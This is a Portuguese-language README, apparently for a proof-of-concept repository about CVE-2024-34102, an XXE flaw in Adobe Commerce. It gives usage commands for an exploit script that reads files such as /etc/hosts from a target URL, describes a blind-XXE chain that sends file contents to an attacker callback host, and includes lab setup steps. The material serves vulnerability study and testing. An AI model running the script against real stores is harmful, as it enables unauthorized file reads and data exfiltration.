
Adobe Commerce XXE exploit
★ Agradecimentos ao @th3gokul, Sanjaith3hacker, Chocapikk pelo código base original. ★
CVE-2024-34102 : Vulnerabilidade XXE no Adobe Commerce descrição: As versões 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 e anteriores do Adobe Commerce são afetadas por uma vulnerabilidade de Restrição Imprópria de Referência de Entidade Externa XML ('XXE') que pode resultar em execução arbitrária de código. Um atacante pode explorar esta vulnerabilidade enviando um documento XML manipulado que referencia entidades externas. A exploração deste problema não requer interação do usuário.
git clone https://github.com/EQSTSeminar/CVE-2024-34102.git
cd CVE-2024-34102
pip install -r requirements.txt
python CVE-2024-34102.py -u <URL_TO_EXPLOIT> -f <FILE_TO_READ>
python CVE-2024-34102.py https://magento.test -f /etc/hosts

Graças à configuração Docker para Magento do markshust, não é difícil criar o ambiente de desenvolvimento vulnerável. https://github.com/markshust/docker-magento
# Create your project directory then go into it:
mkdir /opt/magento
cd $_
# Install some stuff (needed for the script)
sudo apt update
sudo apt install -y bc curl
# Create Composer's directory (to avoid a weird error)
mkdir /var/www/.composer/
# Run this automated one-liner from the directory you want to install your project.
curl -s https://raw.githubusercontent.com/markshust/docker-magento/release/next/lib/onelinesetup | bash -s -- magento.test 2.4.7 community
# Submit credentials when needed.
# Edit hosts file
echo "127.0.0.1 magento.test" >> /etc/hosts

Você pode depurar seu Magento usando PHPSTORM.
bin/xdebug enable

..E então você pode depurar seu Magento.
Criar URL de callback (mocky api) -> Ataque XXE cego (CVE-2024-34102) -> Enviar conteúdo do arquivo para a instância do atacante (SSRFUtility) -> Ler a instância do atacante (SSRFUtility)
Este repositório não se destina a ser um exploit XXE para CVE-2024-34102. O objetivo deste projeto é ajudar as pessoas a aprender sobre essa vulnerabilidade e, talvez, testar seus próprios aplicativos.
Publicamos análises de CVE e malware uma vez por mês. Se você estiver interessado, siga os links abaixo para conferir nossas publicações. https://www.skshieldus.com/eng/business/insight.do